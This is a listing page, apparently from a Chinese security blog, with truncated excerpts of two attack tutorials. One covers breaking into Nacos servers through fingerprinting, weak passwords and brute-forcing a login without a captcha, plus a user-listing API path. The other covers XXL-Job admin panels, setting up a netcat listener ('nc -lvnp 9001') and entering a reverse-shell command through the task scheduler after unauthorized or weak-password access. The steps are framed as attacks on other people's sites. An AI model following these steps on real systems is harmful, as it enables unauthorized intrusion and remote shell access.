摘要:
1.首先我们通过指纹获取到可能存在nacos漏洞的服务器或者网站: 通过弱密码登录后台,如果登录不进去我们可以多尝试几个站,或者使用bp top10对密码进行爆破,因为是没有加验证码或者token认证的登录。 2.http://your-ip:8848/nacos/v1/auth/users?pag 阅读全文
摘要:
1.首先锁定漏洞,在我们通过指纹或者一些特征我们可以获得一些敏感资产: 2.我们在当前url后边加+/xxl-job-admin/ 3.使用我们监听服务器去监听指定端口:比如9001 nc -lvnp 9001 4.通过未授权或者弱口令进入到任务后台在任务调度里边: 输入反弹服务器shell的命令: 阅读全文